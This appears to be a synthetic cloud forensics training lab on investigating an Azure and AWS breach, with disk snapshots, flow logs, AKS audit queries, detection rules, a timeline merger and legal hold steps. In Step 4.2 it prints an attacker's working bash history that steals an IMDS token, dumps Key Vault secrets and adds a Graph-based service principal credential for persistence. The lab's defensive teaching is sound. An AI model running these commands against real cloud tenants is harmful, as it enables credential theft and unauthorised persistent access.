| where Resource == "KV-QFS-PROD-EASTUS"
| where OperationName == "SecretGet"
| where ResultType == "Success"
| extend SecretName = extract(@"secrets/([^/]+)", 1, requestUri_s)
| project TimeGenerated, OperationName, SecretName,
CallerIPAddress, identity_claim_oid_g,
ResultType, DurationMs
| order by TimeGenerated asc
# SYNTHETIC QUERY RESULTS — Secrets accessed by the compromised identity:
# TimeGenerated SecretName CallerIPAddress
# 2026-03-24T14:35:12 db-prod-connection-string 10.150.2.10
# 2026-03-24T14:35:14 db-prod-admin-password 10.150.2.10
# 2026-03-24T14:35:16 api-key-banking-gateway 10.150.2.10
# 2026-03-24T14:35:18 api-key-payment-processor 10.150.2.10
# 2026-03-24T14:35:20 azure-storage-connection-string 10.150.2.10
# 2026-03-24T14:35:22 aws-cross-account-secret 10.150.2.10
# 2026-03-24T14:35:24 smtp-relay-credentials 10.150.2.10
# 2026-03-24T14:35:26 ssl-cert-private-key 10.150.2.10
# 2026-03-24T14:35:28 jwt-signing-key-prod 10.150.2.10
# 2026-03-24T14:35:30 oauth-client-secret 10.150.2.10
# ... (47 total secrets read between 14:35 and 14:38)
# CRITICAL FINDING: The attacker read sensitive secrets including:
# - Database credentials (db-prod-connection-string, db-prod-admin-password)
# - API keys (banking gateway, payment processor)
# - Cross-cloud credentials (aws-cross-account-secret)
# - Cryptographic material (ssl-cert-private-key, jwt-signing-key-prod)
Critical Finding: Cross-Cloud Credential Theft
The compromised Managed Identity read the aws-cross-account-secret from Key Vault. This secret likely contains AWS IAM credentials that enable cross-cloud access. This may explain how the attacker pivoted from Azure to AWS (or vice versa). The investigation must determine:
- What AWS resources does
aws-cross-account-secretgrant access to? - Was this the initial entry point (Azure -> AWS pivot)?
- Has the cross-cloud credential been rotated?
All data is 100% SYNTHETIC.
Exercise 4: Azure VM Disk Forensics & Network Evidence¶
Exercise Objective
Perform forensic acquisition of the compromised Azure VM (vm-compliance-01). Create OS disk snapshots, export disk images for offline analysis, analyze NSG Flow Logs for network evidence, investigate Azure Storage account access, and collect container logs from AKS workloads.
MITRE ATT&CK Techniques:
- T1005 -- Data from Local System
- T1046 -- Network Service Discovery
- T1190 -- Exploit Public-Facing Application
- T1550.001 -- Use Alternate Authentication Material: Application Access Token
- T1613 -- Container and Resource Discovery
Step 4.1: Azure VM Disk Snapshot and Export¶
# ============================================================
# Step 4.1: Create Snapshot of Compromised Azure VM Disk
# ============================================================
# Get details of the compromised VM
$ az vm show \
--resource-group rg-production \
--name vm-compliance-01 \
--query '{
name: name,
vmId: vmId,
location: location,
powerState: instanceView.statuses[1].displayStatus,
osDisk: storageProfile.osDisk.name,
osDiskId: storageProfile.osDisk.managedDisk.id,
dataDisks: storageProfile.dataDisks[].{name:name, diskId:managedDisk.id}
}' \
--show-details \
--output json
# SYNTHETIC OUTPUT:
{
"name": "vm-compliance-01",
"vmId": "a1b2c3d4-vm01-0000-0000-000000000001",
"location": "eastus",
"powerState": "VM running",
"osDisk": "vm-compliance-01-osdisk",
"osDiskId": "/subscriptions/12345678-abcd-ef01-2345-678901234567/resourceGroups/rg-production/providers/Microsoft.Compute/disks/vm-compliance-01-osdisk",
"dataDisks": [
{
"name": "vm-compliance-01-datadisk-01",
"diskId": "/subscriptions/12345678-abcd-ef01-2345-678901234567/resourceGroups/rg-production/providers/Microsoft.Compute/disks/vm-compliance-01-datadisk-01"
}
]
}
# Create snapshot of the OS disk
$ az snapshot create \
--resource-group rg-forensics \
--name "forensic-snap-vm-compliance-01-os-20260324" \
--source "/subscriptions/12345678-abcd-ef01-2345-678901234567/resourceGroups/rg-production/providers/Microsoft.Compute/disks/vm-compliance-01-osdisk" \
--location eastus \
--tags CaseId=QFS-IR-2026-0042 EvidenceType=disk-image \
AcquiredBy=forensic-analyst Classification=CONFIDENTIAL \
DoNotDelete=true
# SYNTHETIC OUTPUT:
{
"name": "forensic-snap-vm-compliance-01-os-20260324",
"id": "/subscriptions/12345678-abcd-ef01-2345-678901234567/resourceGroups/rg-forensics/providers/Microsoft.Compute/snapshots/forensic-snap-vm-compliance-01-os-20260324",
"provisioningState": "Succeeded",
"diskSizeGb": 128,
"timeCreated": "2026-03-24T17:00:00.000Z"
}
# Create snapshot of the data disk
$ az snapshot create \
--resource-group rg-forensics \
--name "forensic-snap-vm-compliance-01-data-20260324" \
--source "/subscriptions/12345678-abcd-ef01-2345-678901234567/resourceGroups/rg-production/providers/Microsoft.Compute/disks/vm-compliance-01-datadisk-01" \
--location eastus \
--tags CaseId=QFS-IR-2026-0042 EvidenceType=disk-image \
AcquiredBy=forensic-analyst Classification=CONFIDENTIAL \
DoNotDelete=true
# Generate SAS URL for disk export (for offline forensic analysis)
$ az snapshot grant-access \
--resource-group rg-forensics \
--name "forensic-snap-vm-compliance-01-os-20260324" \
--duration-in-seconds 86400 \
--access-level Read \
--query accessSas \
--output tsv
# SYNTHETIC SAS URL:
# https://md-forensic.blob.core.windows.net/snapshots/forensic-snap-vm-compliance-01-os-20260324.vhd?sv=2023-11-03&sr=b&sig=REDACTED&se=2026-03-25T17:00:00Z&sp=r
# Download the disk image to the forensic workstation
$ azcopy copy \
"https://md-forensic.blob.core.windows.net/snapshots/forensic-snap-vm-compliance-01-os-20260324.vhd?sv=2023-11-03&sr=b&sig=REDACTED&se=2026-03-25T17:00:00Z&sp=r" \
~/cloud-dfir-lab24/evidence/azure/disk-snapshots/vm-compliance-01-os.vhd
# SYNTHETIC: Download complete — 128 GB VHD file
# Hash the disk image
$ sha256sum ~/cloud-dfir-lab24/evidence/azure/disk-snapshots/vm-compliance-01-os.vhd \
> ~/cloud-dfir-lab24/evidence/azure/disk-snapshots/vm-compliance-01-os.vhd.sha256
echo "[+] Azure VM disk snapshots created and exported"
echo "[+] OS disk: 128 GB | Data disk: 256 GB"
Step 4.2: Azure VM Disk Analysis¶
# ============================================================
# Step 4.2: Mount and Analyze the Azure VM Disk Image
# Convert VHD and mount read-only for examination
# ============================================================
# Convert VHD to raw format for analysis
$ qemu-img convert -f vpc -O raw \
~/cloud-dfir-lab24/evidence/azure/disk-snapshots/vm-compliance-01-os.vhd \
~/cloud-dfir-lab24/evidence/azure/disk-snapshots/vm-compliance-01-os.raw
# List partitions
$ mmls ~/cloud-dfir-lab24/evidence/azure/disk-snapshots/vm-compliance-01-os.raw
# SYNTHETIC OUTPUT:
# DOS Partition Table
# Offset Sector: 0
# Units are in 512-byte sectors
#
# Slot Start End Length Description
# 000: Meta 0000000000 0000000000 0000000001 Primary Table (#0)
# 001: ----- 0000000000 0000002047 0000002048 Unallocated
# 002: 000:000 0000002048 0001048575 0001046528 Linux (0x83) — /boot
# 003: 000:001 0001048576 0268435455 0267386880 Linux (0x83) — /
# Mount the root partition read-only
$ sudo mkdir -p /mnt/forensic-evidence/azure-compliance-vm
$ sudo mount -o ro,noexec,nosuid,nodev,loop,offset=$((1048576 * 512)) \
~/cloud-dfir-lab24/evidence/azure/disk-snapshots/vm-compliance-01-os.raw \
/mnt/forensic-evidence/azure-compliance-vm
# Check for attacker artifacts
$ sudo find /mnt/forensic-evidence/azure-compliance-vm/tmp -type f -ls 2>/dev/null
# SYNTHETIC OUTPUT:
# 1048577 4 -rwxr-xr-x 1 root root 2048 Mar 24 14:50 /mnt/forensic-evidence/azure-compliance-vm/tmp/.az_token_cache
# 1048578 4 -rw-r--r-- 1 root root 512 Mar 24 14:52 /mnt/forensic-evidence/azure-compliance-vm/tmp/.sp_creds.json
# 1048579 8 -rwxr-xr-x 1 root root 8192 Mar 24 14:55 /mnt/forensic-evidence/azure-compliance-vm/tmp/.kv_dump.json
# Examine the cached token file
$ sudo cat /mnt/forensic-evidence/azure-compliance-vm/tmp/.az_token_cache
# SYNTHETIC OUTPUT:
{
"accessToken": "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.REDACTED-SYNTHETIC-TOKEN",
"expiresOn": "2026-03-24T15:50:00.000Z",
"subscription": "12345678-abcd-ef01-2345-678901234567",
"tenant": "a1b2c3d4-e5f6-7890-abcd-ef1234567890",
"tokenType": "Bearer"
}
# Examine the stolen Service Principal credentials
$ sudo cat /mnt/forensic-evidence/azure-compliance-vm/tmp/.sp_creds.json
# SYNTHETIC OUTPUT:
{
"appId": "a1b2c3d4-0000-0000-0000-000000000002",
"displayName": "sp-devops-pipeline",
"tenant": "a1b2c3d4-e5f6-7890-abcd-ef1234567890",
"clientSecret": "REDACTED-SYNTHETIC-SECRET"
}
# Examine the Key Vault secrets dump
$ sudo cat /mnt/forensic-evidence/azure-compliance-vm/tmp/.kv_dump.json | jq 'keys'
# SYNTHETIC OUTPUT:
[
"api-key-banking-gateway",
"api-key-payment-processor",
"aws-cross-account-secret",
"azure-storage-connection-string",
"db-prod-admin-password",
"db-prod-connection-string",
"jwt-signing-key-prod",
"oauth-client-secret",
"smtp-relay-credentials",
"ssl-cert-private-key"
]
# Check bash history on the compromised VM
$ sudo cat /mnt/forensic-evidence/azure-compliance-vm/root/.bash_history
# SYNTHETIC OUTPUT:
# curl -s -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net" -o /tmp/.az_token_cache
# export VAULT_TOKEN=$(cat /tmp/.az_token_cache | jq -r '.access_token')
# for secret in $(curl -s -H "Authorization: Bearer $VAULT_TOKEN" "https://kv-qfs-prod-eastus.vault.azure.net/secrets?api-version=7.4" | jq -r '.value[].id'); do curl -s -H "Authorization: Bearer $VAULT_TOKEN" "${secret}?api-version=7.4" >> /tmp/.kv_dump.json; done
# curl -s -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com" | jq -r '.access_token' > /tmp/.graph_token
# curl -s -H "Authorization: Bearer $(cat /tmp/.graph_token)" "https://graph.microsoft.com/v1.0/applications/a1b2c3d4-0000-0000-0000-000000000002" -X PATCH -H "Content-Type: application/json" -d '{"passwordCredentials":[{"displayName":"backup","endDateTime":"2027-03-24T00:00:00Z"}]}'
# cat /tmp/.kv_dump.json | jq '.value' > /tmp/.sp_creds.json
Critical Finding: Azure IMDS Token Theft and Key Vault Dump
The attacker accessed the Azure Instance Metadata Service (IMDS) on the compromised VM to obtain a Managed Identity OAuth token. Using this token, they:
- Enumerated all secrets in Key Vault
kv-qfs-prod-eastus - Read all 47 secrets (including database credentials and cross-cloud AWS keys)
- Obtained a Microsoft Graph token to modify the
sp-devops-pipelineapplication - Added a new client secret to
sp-devops-pipelinefor persistent access
This confirms the attack chain: VM compromise -> IMDS token theft -> Key Vault secret exfiltration -> Service Principal persistence.
Step 4.3: NSG Flow Logs Analysis¶
# ============================================================
# Step 4.3: Azure NSG Flow Logs — Network Evidence
# Identify lateral movement and external connections
# ============================================================
# List NSG Flow Log configuration
$ az network watcher flow-log list \
--location eastus \
--query '[].{name:name, nsg:targetResourceId, enabled:enabled, storageId:storageId}' \
--output table
# SYNTHETIC OUTPUT:
# Name NSG Enabled StorageId
# ---------------------- ------------------------------------ -------- ----------------------------
# nsg-flowlog-identity nsg-snet-identity true stqfsflowlogseastus
# nsg-flowlog-compliance nsg-snet-compliance true stqfsflowlogseastus
# Download NSG Flow Logs for the compliance subnet
$ az storage blob download \
--account-name stqfsflowlogseastus \
--container-name "insights-logs-networksecuritygroupflowevent" \
--name "resourceId=/SUBSCRIPTIONS/12345678-ABCD-EF01-2345-678901234567/RESOURCEGROUPS/RG-PRODUCTION/PROVIDERS/MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/NSG-SNET-COMPLIANCE/y=2026/m=03/d=24/h=14/m=00/macAddress=000000000001/PT1H.json" \
--file ~/cloud-dfir-lab24/evidence/azure/nsg-flows/compliance-subnet-20260324-14.json
# Parse NSG Flow Logs
$ cat ~/cloud-dfir-lab24/evidence/azure/nsg-flows/compliance-subnet-20260324-14.json | \
jq '.records[].properties.flows[].flows[].flowTuples[]' -r | \
head -20
# SYNTHETIC NSG FLOW LOG OUTPUT:
# timestamp,srcIP,dstIP,srcPort,dstPort,proto,direction,action,state,srcPackets,srcBytes,dstPackets,dstBytes
# 1711288512,10.150.2.10,10.150.1.5,45678,443,T,O,A,B,15,4096,12,3072
# 1711288515,10.150.2.10,203.0.113.42,45679,4443,T,O,A,B,8,2048,5,1024
# 1711288520,10.150.2.10,10.150.1.5,45680,443,T,O,A,B,22,8192,18,6144
# 1711288530,10.150.2.10,198.51.100.99,45681,443,T,O,A,E,1247,15678912,312,8192
# Analyze the flows
$ python3 << 'PYEOF'
# SYNTHETIC — NSG Flow Log Analysis
flows = [
{"time": "14:35:12", "src": "10.150.2.10", "dst": "10.150.1.5", "dport": 443, "bytes_out": 4096, "desc": "Key Vault API access"},
{"time": "14:38:15", "src": "10.150.2.10", "dst": "203.0.113.42", "dport": 4443, "bytes_out": 2048, "desc": "C2 channel (SYNTHETIC)"},
{"time": "14:40:00", "src": "10.150.2.10", "dst": "10.150.1.5", "dport": 443, "bytes_out": 8192, "desc": "Graph API access"},
{"time": "14:55:00", "src": "10.150.2.10", "dst": "198.51.100.99", "dport": 443, "bytes_out": 15678912, "desc": "Data exfiltration (SYNTHETIC)"},
{"time": "15:10:00", "src": "10.150.2.10", "dst": "10.160.1.10", "dport": 443, "bytes_out": 4096, "desc": "AKS API access"},
{"time": "15:15:00", "src": "10.150.2.10", "dst": "10.160.2.5", "dport": 443, "bytes_out": 2048, "desc": "Storage account access"},
]
print("=" * 80)
print("NSG FLOW LOG ANALYSIS — vm-compliance-01 (10.150.2.10)")
print("Case: QFS-IR-2026-0042 | ALL DATA IS SYNTHETIC")
print("=" * 80)
print(f"\n{'Time':>10} {'Source':<16} {'Destination':<16} {'Port':>6} {'Bytes Out':>12} Description")
print("-" * 80)
for f in flows:
print(f"{f['time']:>10} {f['src']:<16} {f['dst']:<16} {f['dport']:>6} {f['bytes_out']:>12,} {f['desc']}")
total_exfil = sum(f["bytes_out"] for f in flows if "exfil" in f["desc"].lower())
print(f"\nTotal data exfiltrated to external IPs: {total_exfil / (1024*1024):.1f} MB")
print("External destinations: 203.0.113.42 (C2), 198.51.100.99 (exfil)")
print("Internal pivot targets: 10.150.1.5 (KV/Graph), 10.160.1.10 (AKS), 10.160.2.5 (Storage)")
PYEOF
Step 4.4: Azure Storage Account Access Forensics¶
# ============================================================
# Step 4.4: Azure Storage Account Access Investigation
# Check if the attacker accessed analytics data
# ============================================================
# Query Storage Analytics logs
$ az monitor activity-log list \
--resource-id "/subscriptions/12345678-abcd-ef01-2345-678901234567/resourceGroups/rg-analytics/providers/Microsoft.Storage/storageAccounts/stqfsanalyticswestus2" \
--start-time "2026-03-24T00:00:00Z" \
--end-time "2026-03-25T00:00:00Z" \
--output json | \
jq '[.[] | select(.caller | contains("mi-compliance") or contains("sp-devops")) |
{time: .eventTimestamp, caller: .caller, operation: .operationName.value,
status: .status.value}]'
# SYNTHETIC OUTPUT:
[
{
"time": "2026-03-24T15:15:33Z",
"caller": "mi-compliance-scanner",
"operation": "Microsoft.Storage/storageAccounts/listKeys/action",
"status": "Succeeded"
},
{
"time": "2026-03-24T15:16:00Z",
"caller": "mi-compliance-scanner",
"operation": "Microsoft.Storage/storageAccounts/blobServices/containers/read",
"status": "Succeeded"
},
{
"time": "2026-03-24T15:18:00Z",
"caller": "mi-compliance-scanner",
"operation": "Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read",
"status": "Succeeded"
}
]
# FINDING: Compromised identity listed storage keys and accessed blob data
# at 15:15 UTC — 40 minutes after the initial Key Vault breach
Step 4.5: AKS Container Log Collection¶
# ============================================================
# Step 4.5: AKS Container Log Collection
# Check for container-level compromise
# ============================================================
# Get AKS cluster credentials (forensic read-only)
$ az aks get-credentials \
--resource-group rg-analytics \
--name aks-qfs-analytics \
--admin \
--file ~/cloud-dfir-lab24/evidence/azure/aks-kubeconfig
# Query Kubernetes audit logs from Log Analytics
// AKS Audit Log — Suspicious Container Activity
// Case: QFS-IR-2026-0042
AzureDiagnostics
| where TimeGenerated between (
datetime("2026-03-24T14:00:00Z") .. datetime("2026-03-25T00:00:00Z"))
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.verb in ("create", "exec", "attach")
| where AuditLog.objectRef.resource in ("pods", "pods/exec", "secrets")
| project
TimeGenerated,
Verb = tostring(AuditLog.verb),
Resource = tostring(AuditLog.objectRef.resource),
Namespace = tostring(AuditLog.objectRef.namespace),
Name = tostring(AuditLog.objectRef.name),
User = tostring(AuditLog.user.username),
SourceIP = tostring(AuditLog.sourceIPs[0]),
Decision = tostring(AuditLog.annotations["authorization.k8s.io/decision"])
| order by TimeGenerated asc
# SYNTHETIC QUERY RESULTS:
# TimeGenerated Verb Resource Namespace Name User SourceIP Decision
# 2026-03-24T15:20:00 list secrets default - system:serviceaccount 10.150.2.10 allow
# 2026-03-24T15:20:30 get secrets kube-system cluster-secrets system:serviceaccount 10.150.2.10 allow
# 2026-03-24T15:22:00 exec pods/exec analytics spark-worker-01 system:serviceaccount 10.150.2.10 allow
# Check diagnostic settings coverage
$ az monitor diagnostic-settings list \
--resource "/subscriptions/12345678-abcd-ef01-2345-678901234567/resourceGroups/rg-analytics/providers/Microsoft.ContainerService/managedClusters/aks-qfs-analytics" \
--query '[].{name:name, categories:[logs[?enabled==`true`].category]}' \
--output json
# SYNTHETIC OUTPUT:
[
{
"name": "aks-diag-sentinel",
"categories": [["kube-audit", "kube-audit-admin", "guard"]]
}
]
# FINDING: Attacker accessed Kubernetes secrets and exec'd into a pod
# from the compromised VM (10.150.2.10) at 15:20-15:22 UTC
Exercise 4 Detection Queries¶
// -----------------------------------------------------------------
// Detection: Azure IMDS Token Request from Unusual Process
// MITRE: T1552.005 — Cloud Instance Metadata API
// -----------------------------------------------------------------
// Requires VM-level logging (Sysmon for Linux or Microsoft Defender)
Syslog
| where TimeGenerated > ago(24h)
| where ProcessName in ("curl", "wget", "python", "python3")
| where SyslogMessage contains "169.254.169.254"
| where SyslogMessage contains "identity/oauth2/token"
| project TimeGenerated, Computer, ProcessName, SyslogMessage
| order by TimeGenerated asc
// -----------------------------------------------------------------
// Detection: Azure Storage Account Key Listed
// MITRE: T1552.001 — Unsecured Credentials
// -----------------------------------------------------------------
AzureActivity
| where TimeGenerated > ago(7d)
| where OperationNameValue == "Microsoft.Storage/storageAccounts/listKeys/action"
| where ActivityStatusValue == "Success"
| project TimeGenerated, Caller, CallerIpAddress, ResourceGroup,
Resource, OperationNameValue
| join kind=leftanti (
datatable(Caller: string) [
"known-automation-identity" // SYNTHETIC
]
) on Caller
| order by TimeGenerated desc
// -----------------------------------------------------------------
// Detection: AKS Pod Exec from External IP
// MITRE: T1609 — Container Administration Command
// -----------------------------------------------------------------
AzureDiagnostics
| where TimeGenerated > ago(24h)
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.verb == "create"
| where AuditLog.objectRef.subresource == "exec"
| extend PodName = tostring(AuditLog.objectRef.name)
| extend Namespace = tostring(AuditLog.objectRef.namespace)
| extend User = tostring(AuditLog.user.username)
| extend SourceIP = tostring(AuditLog.sourceIPs[0])
| where SourceIP !startswith "10.160." // Not from expected AKS subnet
| project TimeGenerated, PodName, Namespace, User, SourceIP
// -----------------------------------------------------------------
// Detection: Azure IMDS Token Request from Unusual Process
// MITRE: T1552.005
// -----------------------------------------------------------------
index=azure_vms sourcetype="syslog"
(process="curl" OR process="wget" OR process="python" OR process="python3")
"169.254.169.254" "identity/oauth2/token"
earliest=-24h
| table _time, host, process, message
// -----------------------------------------------------------------
// Detection: Azure Storage Account Key Listed
// MITRE: T1552.001
// -----------------------------------------------------------------
index=azure sourcetype="azure:monitor:activity"
operationName.value="Microsoft.Storage/storageAccounts/listKeys/action"
status.value="Succeeded"
earliest=-7d
| search NOT Caller IN ("known-automation-identity")
| table _time, Caller, CallerIpAddress, ResourceGroup, Resource
// -----------------------------------------------------------------
// Detection: AKS Pod Exec from External IP
// MITRE: T1609
// -----------------------------------------------------------------
index=azure sourcetype="azure:monitor" Category="kube-audit"
earliest=-24h
| spath path=log_s output=AuditLog
| spath input=AuditLog path=verb output=Verb
| spath input=AuditLog path=objectRef.subresource output=SubResource
| where Verb="create" AND SubResource="exec"
| spath input=AuditLog path=objectRef.name output=PodName
| spath input=AuditLog path=objectRef.namespace output=Namespace
| spath input=AuditLog path=user.username output=User
| spath input=AuditLog path=sourceIPs{0} output=SourceIP
| where NOT cidrmatch("10.160.0.0/16", SourceIP)
| table _time, PodName, Namespace, User, SourceIP
Exercise 5: Cross-Cloud IR Coordination & Reporting¶
Exercise Objective
Coordinate the cross-cloud incident response by merging AWS and Azure forensic timelines, executing legal hold procedures, building comprehensive chain of custody documentation, writing the forensic report (executive summary and technical findings), preparing evidence for law enforcement handoff, and detecting anti-forensics techniques across both clouds.
MITRE ATT&CK Techniques:
- T1562.001 -- Impair Defenses: Disable or Modify Tools
- T1562.008 -- Impair Defenses: Disable or Modify Cloud Logs
- T1070.001 -- Indicator Removal: Clear Windows Event Logs
- T1070.004 -- Indicator Removal: File Deletion
Step 5.1: Multi-Cloud Timeline Correlation¶
#!/usr/bin/env python3
"""
Cross-Cloud Timeline Merger — AWS + Azure
Case: QFS-IR-2026-0042
All data is 100% SYNTHETIC
"""
from datetime import datetime
from collections import defaultdict
# Define all events from both clouds (SYNTHETIC)
unified_timeline = [
# AWS Events
{"time": "2026-03-24T14:28:11Z", "cloud": "AWS", "category": "Reconnaissance",
"event": "GetCallerIdentity — attacker validates stolen credentials",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "Medium"},
{"time": "2026-03-24T14:28:15Z", "cloud": "AWS", "category": "Reconnaissance",
"event": "ListAttachedUserPolicies — enumerate account permissions",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "Medium"},
{"time": "2026-03-24T14:29:01Z", "cloud": "AWS", "category": "Reconnaissance",
"event": "ListUsers, ListRoles — enumerate IAM principals",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "Medium"},
{"time": "2026-03-24T14:30:12Z", "cloud": "AWS", "category": "Reconnaissance",
"event": "DescribeInstances/VPCs/Subnets/SGs — infrastructure mapping",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "Medium"},
{"time": "2026-03-24T14:32:10Z", "cloud": "AWS", "category": "Reconnaissance",
"event": "ListBuckets, GetBucketAcl, GetBucketPolicy — S3 enumeration",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "High"},
{"time": "2026-03-24T14:34:22Z", "cloud": "AWS", "category": "Credential Access",
"event": "ListSecrets, GetSecretValue — Secrets Manager access",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "Critical"},
# Azure Events — nearly simultaneous with AWS activity
{"time": "2026-03-24T14:35:12Z", "cloud": "Azure", "category": "Credential Access",
"event": "Key Vault SecretGet — mass secret enumeration begins (47 secrets in 3 min)",
"actor": "mi-compliance-scanner", "source_ip": "10.150.2.10", "severity": "Critical"},
{"time": "2026-03-24T14:36:12Z", "cloud": "AWS", "category": "Persistence",
"event": "CreateAccessKey — attacker creates new access key for dev-jenkins-ci",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "Critical"},
{"time": "2026-03-24T14:38:00Z", "cloud": "AWS", "category": "PrivEsc Attempt",
"event": "AssumeRole AdminFullAccess — DENIED",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "High"},
{"time": "2026-03-24T14:38:00Z", "cloud": "Azure", "category": "Detection",
"event": "Sentinel alert: Unusual Key Vault access by Managed Identity",
"actor": "SYSTEM", "source_ip": "N/A", "severity": "Medium"},
{"time": "2026-03-24T14:40:22Z", "cloud": "AWS", "category": "Resource Hijacking",
"event": "RunInstances — attacker launched EC2 instance (cryptomining suspected)",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "High"},
{"time": "2026-03-24T14:52:33Z", "cloud": "Azure", "category": "Persistence",
"event": "Service Principal sp-devops-pipeline — new client secret added",
"actor": "mi-compliance-scanner", "source_ip": "10.150.2.10", "severity": "Critical"},
{"time": "2026-03-24T15:02:33Z", "cloud": "AWS", "category": "Exfiltration Prep",
"event": "PutBucketPolicy — S3 data lake made public (Principal: *)",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "Critical"},
{"time": "2026-03-24T15:05:00Z", "cloud": "AWS", "category": "Data Access",
"event": "GetObject — multiple S3 data lake files accessed (PII, financial)",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "Critical"},
{"time": "2026-03-24T15:15:33Z", "cloud": "Azure", "category": "Credential Access",
"event": "Storage account listKeys — analytics storage keys retrieved",
"actor": "mi-compliance-scanner", "source_ip": "10.150.2.10", "severity": "High"},
{"time": "2026-03-24T15:20:00Z", "cloud": "Azure", "category": "Container Compromise",
"event": "AKS secrets listed, pod exec on spark-worker-01",
"actor": "mi-compliance-scanner", "source_ip": "10.150.2.10", "severity": "High"},
{"time": "2026-03-24T15:47:22Z", "cloud": "AWS", "category": "Anti-Forensics",
"event": "StopLogging — CloudTrail disable attempt — DENIED",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "Critical"},
{"time": "2026-03-24T15:48:05Z", "cloud": "AWS", "category": "Anti-Forensics",
"event": "DeleteTrail — CloudTrail delete attempt — DENIED",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "Critical"},
{"time": "2026-03-24T15:55:12Z", "cloud": "AWS", "category": "Lateral Movement",
"event": "SSM StartSession — attacker accessed API Gateway instance",
"actor": "dev-jenkins-ci", "source_ip": "203.0.113.42", "severity": "Critical"},
{"time": "2026-03-24T15:58:00Z", "cloud": "AWS", "category": "Data Exfiltration",
"event": "Database export — 50k customer records via psql to /tmp/.staging/",
"actor": "dev-jenkins-ci (via SSM)", "source_ip": "10.100.1.15", "severity": "Critical"},
{"time": "2026-03-24T16:01:00Z", "cloud": "AWS", "category": "Data Exfiltration",
"event": "curl to 198.51.100.99 — compressed customer data exfiltrated (150+ MB)",
"actor": "dev-jenkins-ci (via SSM)", "source_ip": "10.100.1.15", "severity": "Critical"},
{"time": "2026-03-24T14:32:00Z", "cloud": "AWS", "category": "Detection",
"event": "GuardDuty alert: Recon:IAMUser/MaliciousIPCaller.Custom",
"actor": "SYSTEM", "source_ip": "N/A", "severity": "High"},
]
# Sort by timestamp
unified_timeline.sort(key=lambda x: x["time"])
# Print unified timeline
print("=" * 120)
print("UNIFIED CROSS-CLOUD INCIDENT TIMELINE")
print(f"Case: QFS-IR-2026-0042 | Quantum Financial Services")
print(f"Period: 2026-03-24T14:28:11Z — 2026-03-24T16:01:00Z (~1.5 hours)")
print("ALL DATA IS 100% SYNTHETIC")
print("=" * 120)
print()
print(f"{'Time':<24} {'Cloud':<8} {'Severity':<10} {'Category':<22} {'Event'}")
print("-" * 120)
for event in unified_timeline:
severity_marker = ""
if event["severity"] == "Critical":
severity_marker = "[!!!]"
elif event["severity"] == "High":
severity_marker = "[!!] "
elif event["severity"] == "Medium":
severity_marker = "[!] "
print(f"{event['time']:<24} {event['cloud']:<8} {severity_marker:<10} "
f"{event['category']:<22} {event['event']}")
# Print attack phase summary
print()
print("=" * 120)
print("ATTACK PHASE SUMMARY")
print("=" * 120)
phases = defaultdict(list)
for e in unified_timeline:
if e["actor"] != "SYSTEM":
phases[e["category"]].append(e)
for phase, events in phases.items():
clouds = set(e["cloud"] for e in events)
print(f"\n {phase} ({len(events)} events, clouds: {', '.join(clouds)})")
for e in events:
print(f" - {e['time']} [{e['cloud']}] {e['event'][:80]}")
print(f"\n{'='*120}")
print("CROSS-CLOUD CORRELATION FINDINGS:")
print(" 1. AWS and Azure attacks occurred nearly simultaneously (within 7 min)")
print(" 2. Common attacker IP: 203.0.113.42 (AWS direct), via IMDS pivot (Azure)")
print(" 3. Key Vault 'aws-cross-account-secret' links the two cloud environments")
print(" 4. Attack chain: stolen CI/CD creds -> AWS recon -> Azure VM compromise ->")
print(" Key Vault dump -> cross-cloud pivot -> data exfiltration from both clouds")
print(" 5. Anti-forensics attempted in AWS (CloudTrail disable) — DENIED")
print(" 6. Persistence established in both clouds (IAM key + SP credential)")
print(f"{'='*120}")
Step 5.2: Legal Hold Procedures¶
# ============================================================
# Step 5.2: Legal Hold Implementation
# Preserve all evidence for potential litigation/law enforcement
# ============================================================
# --- AWS Legal Hold ---
# 1. Enable S3 Object Lock on the forensic evidence bucket
$ aws s3api put-object-lock-configuration \
--bucket qfs-forensic-evidence-123456789012 \
--object-lock-configuration '{
"ObjectLockEnabled": "Enabled",
"Rule": {
"DefaultRetention": {
"Mode": "COMPLIANCE",
"Days": 2555
}
}
}' \
--profile forensics
# 2. Enable versioning on CloudTrail bucket (prevent log deletion)
$ aws s3api put-bucket-versioning \
--bucket qfs-cloudtrail-123456789012 \
--versioning-configuration Status=Enabled \
--profile forensics
# 3. Create IAM policy to prevent evidence deletion
$ cat > /tmp/evidence-protection-policy.json << 'POLICY_EOF'
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "PreventEvidenceDeletion",
"Effect": "Deny",
"Action": [
"s3:DeleteObject",
"s3:DeleteObjectVersion",
"s3:PutLifecycleConfiguration",
"ec2:DeleteSnapshot",
"ec2:DeregisterImage"
],
"Resource": "*",
"Condition": {
"StringEquals": {
"aws:ResourceTag/CaseId": "QFS-IR-2026-0042"
}
}
}
]
}
POLICY_EOF
$ aws iam create-policy \
--policy-name "LegalHold-QFS-IR-2026-0042" \
--policy-document file:///tmp/evidence-protection-policy.json \
--profile forensics
# --- Azure Legal Hold ---
# 1. Apply immutability policy to forensic storage
$ az storage container immutability-policy create \
--account-name stqfsforensicseastus \
